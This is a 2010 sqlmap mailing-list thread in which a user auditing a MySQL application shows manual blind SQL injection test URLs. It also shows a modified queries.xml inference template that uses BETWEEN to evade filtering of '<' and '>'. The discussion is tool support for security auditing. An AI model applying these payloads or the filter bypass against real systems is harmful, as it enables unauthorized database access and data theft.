Re: [sqlmap-users] blind sql injection problem
Brought to you by:
inquisb
From: velky b. <vel...@gm...> - 2010-02-23 10:30:48
|
Ok, I have resolved the problem. Just brief info for other users: If characters like '<' or '>' are filtered, it is possible to modify query like this <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/> vb On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote: > Hello, > I have found blind SQL injection in the GET parameter of audited MySQL > application (also sqlmap is able to identify the injection), but it is not > possible to dump any data (like --current-user or --current-db). Only > option, which is working is --fingerprint (gives correct result of mySQL 5 > version), all other options gave the same result as "None". > Because it looked strange to me, I made some basic tests manually with > following results: > > > http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE) > http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE) > > http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE) > http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE) > > http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE > http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE > > As you can see from these results, it looks that characters "<" and ">" > are filtered within application. > > However, injection is still working. I suppose, that sqlmap uses these > characters ("<",">") really often during dumping of data from database. > So I have changed the following line in mysql section of queries.xml file: > > original line: > <inference query="AND ORD(MID((%s), %d, 1)) > %d"/> > > updated line: > <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/> > > Unfortunatelly, the result was same (None). What else should be modified? > > Is it be possible to use BETWEEN statement instead of ">" in current > version of sqlmap? > Is it already supported somehow in sqlmap or would it appear in future > versions? > > Thank you in advance > > vb > > |